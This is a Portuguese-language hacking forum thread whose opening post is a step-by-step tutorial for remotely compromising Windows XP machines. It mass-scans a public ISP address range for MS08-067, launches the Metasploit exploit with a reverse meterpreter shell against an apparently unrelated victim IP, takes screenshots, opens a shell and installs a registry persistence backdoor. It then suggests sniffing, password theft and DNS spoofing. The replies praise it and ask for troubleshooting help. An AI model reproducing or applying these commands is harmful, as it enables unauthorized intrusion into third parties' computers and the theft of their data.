Unconfigured Ad Widget

Collapse

Anúncio

Collapse
No announcement yet.

Invasão Remota em Windows XP sp 2&3 - Real Live

Collapse
X
 
  • Filter
  • Tempo
  • Show
Clear All
new posts

  • Font Size
    #1

    Tutorial Invasão Remota em Windows XP sp 2&3 - Real Live

    Abro a shell do meu backtrack e digito:

    root@bt:~# nmap -p 445 --script=smb-check-vulns 189.29.148.* --> -p pra porta especifica, a parte

    do script é pra achar vulnerabilidades no serviço "smb" o asteristico no final do ip é pra passa em toda faixa de ip.

    Aparece uma lista gigantesca de resultados de portas fechadas, não sabe avaliar, não vulneravel, possivelmente vulneravel e

    vulneraveis. Aqui a saida de um vulneravel:

    Nmap scan report for 189-29-151-59-nd.cpe.vivax.com.br (189.29.151.59)
    Host is up (0.078s latency).
    PORT STATE SERVICE
    445/tcp open microsoft-ds

    Host script results:
    | smb-check-vulns:
    | MS08-067: VULNERABLE
    | Conficker: Likely CLEAN
    | regsvc DoS: CHECK DISABLED (add '--script-args=unsafe=1' to run)
    | SMBv2 DoS (CVE-2009-3103): CHECK DISABLED (add '--script-args=unsafe=1' to run)
    | MS06-025: CHECK DISABLED (remove 'safe=1' argument to run)
    |_ MS07-029: CHECK DISABLED (remove 'safe=1' argument to run)


    Então abro outra shell e dou o comando "msfconsole":

    root@bt:~# msfconsole .


    ____ ____| |_ ____ ___ ____ | | ___ _| |_
    | \ / _ ) _)/ _ |/___) _ \| |/ _ \| | _)
    | | | ( (/ /| |_( ( | |___ | | | | | |_| | | |__
    |_|_|_|\____)\___)_||_(___/| ||_/|_|\___/|_|\___)
    |_|


    =[ metasploit v3.6.0-dev [core:3.6 api:1.0]
    + -- --=[ 640 exploits - 322 auxiliary
    + -- --=[ 215 payloads - 27 encoders - 8 nops
    =[ svn r11458 updated 3 days ago (2010.12.31)

    msf > search ms08-067 --> Busca por exploit que contenha no nome "ms08-067"[*] Searching loaded modules for pattern 'ms08-067'...

    Exploits
    ========

    Name Disclosure Date Rank Description
    ---- --------------- ---- -----------
    windows/smb/ms08_067_netapi 2008-10-28 great Microsoft Server Service Relative Path Stack Corruption

    msf > use windows/smb/ms08_067_netapi --> Utilizar o exploit ms08-067


    msf exploit(ms08_067_netapi) > set payload windows/meterpreter/reerse_tcp - Utiliza o payload do reverse

    meterpreter
    payload => windows/meterpreter/reverse_tcp

    msf exploit(ms08_067_netapi) > set LPORT 4444 --> Ouvir na Porta 4444
    LPORT => 4444

    msf exploit(ms08_067_netapi) > set LHOST xxx.xxx.xxx.xxx --> Se conecta no no alvo (Meu Ip)
    LHOST => xxx.xxx.xxx.xxx

    msf exploit(ms08_067_netapi) > set RHOST 189.29.151.59 --> Computador Vulneravel
    RHOST => 189.29.148.57

    msf exploit(ms08_067_netapi) > set ReverseListenerBindAddress 192.168.xxx.xxx --> Endereço de rede da minha maquina atacante
    ReverseListenerBindAddress => 192.168.xxx.xxx

    msf exploit(ms08_067_netapi) > set target 0 --> Dedecção de Alvo Automatica
    target => 0

    msf exploit(ms08_067_netapi) > exploit --> Lança Exploit


    [*] Started reverse handler on 192.168.xxx.xxxx:4444[*] Automatically detecting the target...[*] Fingerprint: Windows XP Service Pack 2 - lang:Portuguese - Brazilian[*] Selected Target: Windows XP SP2 Portuguese - Brazilian (NX)[*] Attempting to trigger the vulnerability...[*] Sending stage (749056 bytes) to 189.29.151.59[*] Meterpreter session 1 opened (192.168.xxx.xxx:4444 -> 189.29.151.59:1747) at Mon Jan 03 17:51: 27 -0200 2011


    meterpreter > screenshot

    saved to: /root/bFywwIDQ.jpeg




    meterpreter > shell

    Process 2168 created.
    Microsoft Windows XP [versÆo 5.1.2600]
    (C) Copyright 1985-2001 Microsoft Corp.

    C:\WINDOWS\system32>exit

    meterpreter > run persistence -U -i 5 -p 4444 -r Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...


    [*]Running Persistance Script[*]Resource file for cleanup created at /root/xxxxxx.rc[*]Creating Payload=windows/meterpreter/reverse_tcp LHOST=xxxx LPORT=4444[*]Persistent agent script is 609675 bytes long
    [+]Persisten Script written to C:\WINDOWS\TEMP\xHAyoOFceV.vbs[*]Executing script C:\WINDOWS\TEMP\xHAyoOFceV.vbs
    [+]Agent executed with PID 2712[*]Installing into autorun as HKCU\Software\Microsoft\Windows\CurrentVersion\Run \gFNSUfyFe
    [+]Installed into autorun as HKCU\Software\Microsoft\Windows\CurrentVersion\Run \gFNSUfyFe

    Explicações:

    -i 5 a cada 5 segundos ele teta se conectar com o atacante
    -p port porta de conexão
    -r seuip Ip que ele tenta se conectar

    Ae o resto o de sempre, sniffa, roubo de senhas, spoffe dns e apropiação de computadores na rede.


    Fiz agora a pouco, um pentest na rede do meu colega juliano



    Creditos : inocente

  • Font Size
    #2
    q tal fazer um video disse?

    Comment


    • Font Size
      #3
      Que tal fazer um video disso²

      sigpic

      "Conhecimento não é crime, crime é o que você faz com ele."
      "Nunca deixe te dizer que você não é capaz"
      "Vocês podem me acorrentar, torturar e até destruir meu corpo, mas nunca aprisionaram minha mente"




      Full Access Defacer


      e-mail & msn: warlockowned@yahoo.com.br


      Comment


      • Font Size
        #4
        Sim vo fazer a video aula mais pra frente porque agora to meio sem tempo trabalho muito é minha folga e so as 06:00 da manha é dai e a hora que tenho que dormir mais msm assim vo fazer a video aula e quando der vo postar

        Comment


        • Font Size
          #5
          boa mano
          vlws por compartilhar


          sigpic

          Visitem minha galeria: http://m2gf.deviantart.com/

          Comment


          • Font Size
            #6
            Ótimo cara, muito bem explicado.

            att.



            areax@hotmail.com



            Comment


            • Font Size
              #7
              muito bom man ta bem explicado vlw por compartilhar
              sigpic

              Comment


              • Font Size
                #8
                Gostei demais, mais tipo eu fiz tudo certo, mais chega no final não aparece o METERPRETER...

                Ele para assim:

                [*] Started reverse handler on 192.168.xxx.xxxx:4444
                [*] Automatically detecting the target...
                [*] Fingerprint: Windows XP Service Pack 2 - lang:Portuguese - Brazilian
                [*] Selected Target: Windows XP SP2 Portuguese - Brazilian (NX)
                [*] Attempting to trigger the vulnerability...
                msf exploit(ms08_067_netapi):

                Comment


                • Font Size
                  #9
                  Postado Originalmente por pda Ver Post
                  gostei demais, mais tipo eu fiz tudo certo, mais chega no final não aparece o meterpreter...

                  Ele para assim:

                  [*] started reverse handler on 192.168.xxx.xxxx:4444
                  [*] automatically detecting the target...
                  [*] fingerprint: Windows xp service pack 2 - langortuguese - brazilian
                  [*] selected target: Windows xp sp2 portuguese - brazilian (nx)
                  [*] attempting to trigger the vulnerability...
                  Msf exploit(ms08_067_netapi):
                  Também estou com esse problema, ajudem aqui posto parece abandonado ! AJUDA!

                  Comment


                  • Font Size
                    #10
                    AJUDEM, NINGUÉM RESPONDE.... PAREI IGUAL O PDA, parece que o tópico ta abandonado!

                    Comment


                    • Font Size
                      #11
                      tipo infelismente o MS08-067 NOT VULNERABLE.

                      vou pesquisar como deixa ele vulneravel para testar.. a invasão. obrigado por compartilhar.
                      desculta errei o obrigado aí up... se tiver como remover remova please.

                      Comment


                      • Font Size
                        #12
                        isso ai so funfa em xpzao ou win2003 q nao ta atualizado, mas ate uns tempos atras era muito facil de achar, ehehe

                        Comment


                        • Font Size
                          #13
                          Sim, isso nem funciona mais, mas dando sorte se pode achar algum com o pc desatualizado kkk.

                          Comment


                          • Font Size
                            #14
                            É uma aula caia bem !

                            Comment


                            • Font Size
                              #15
                              cara,show de bola,faz uma vídeo aula com áudio e tudo bem detalhado.parabéns.

                              Comment

                              X
                              Working...
                              X